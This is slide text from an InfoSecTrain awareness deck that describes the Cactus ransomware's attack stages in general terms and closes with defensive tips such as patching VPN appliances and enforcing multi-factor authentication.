The document describes Cactus ransomware, noting that it sets itself apart through distinctive encryption methods that make it difficult to detect. It exploits VPN vulnerabilities to infiltrate networks rather than relying on phishing emails, and has the ability to self-encrypt to remain undetected on compromised systems. The document outlines the attack tactics, techniques, and procedures used by Cactus ransomware, including gaining initial access through VPN weaknesses, installing ransomware, mapping the network, deploying tools to facilitate lateral movement, installing remote monitoring software, exfiltrating data, disabling antivirus, and distributing ransomware across all systems.
2. WHAT IS
CACTUS
Cactus Ransomware sets itself
apart with its distinctive encryption
methods, making it difficult to detect
by security tools. It exploits VPN
vulnerabilities to infiltrate networks
instead of relying on phishing emails,
and it possesses the uncommon
ability to self-encrypt, enhancing
its chances of remaining
undetected on compromised
systems.
www.infosectrain.com
@infosectrain
#
l
e
a
r
n
t
o
r
i
s
e
RANSOMWARE
Lorem ipsum dolor sit amet, consectetur
adipiscing elit, sed diam nonummy
LOREM IPSUM
3. The attacker gets into the victim's
network using a weakness in a
VPN appliance. They do this by
taking advantage of known
vulnerabilities in VPN appliances
that haven't been fixed
or updated.
www.infosectrain.com
@infosectrain
#
l
e
a
r
n
t
o
r
i
s
e
CACTUS
Attack Tactics Techniques
& Procedures
RANSOMWARE
STEP 1
CONNECT
VPN
4. The attacker installs the Cactus
ransomware on the victim's system.
This can be done through various
methods, such as phishing emails,
malicious attachments, or drive
by downloads.
www.infosectrain.com
@infosectrain
#
l
e
a
r
n
t
o
r
i
s
e
The attacker conducts an internal
network scan using tools like
SoftPerfect Network Scanner or
PSnmap to create a map of the
environment.
STEP 3
STEP 2
!
* * * * * * * * *
* * * * * * * * *
5. To facilitate lateral movement, the
attacker deploys the CobaltStrike
post-exploitation framework
and Chisel proxying tool.
www.infosectrain.com
@infosectrain
#
l
e
a
r
n
t
o
r
i
s
e
The attacker installs Remote
Monitoring and Management
(RMM) tools on compromised systems,
enabling remote access and file
pushing capabilities.
STEP 5
STEP 4
6. The attacker employs the Rclone
tool to conduct data theft from
the environment, automating the
process for data exfiltration.
www.infosectrain.com
@infosectrain
#
l
e
a
r
n
t
o
r
i
s
e
STEP 7
The attacker executes a script
to disable widely used anti-virus
tools to decrease the chances
of their tools being detected
and blocked.
STEP 6
8. www.infosectrain.com
@infosectrain
#
l
e
a
r
n
t
o
r
i
s
e
TIPS TO PROTECT YOURSELF FROM
CACTUS
Keeping VPN appliances up to
date with the latest security patches.
RANSOMWARE
01
Using network monitoring tools to
detect suspicious activity.
02
Educating yourself about ransomware
attacks.
03
Implementing strong password policies
and enforcing multi-factor authentication.
04
9. FOUND THIS USEFUL?
Get More Insights Through Our FREE
Courses | Workshops | eBooks | Checklists | Mock Tests
LIKE SHARE FOLLOW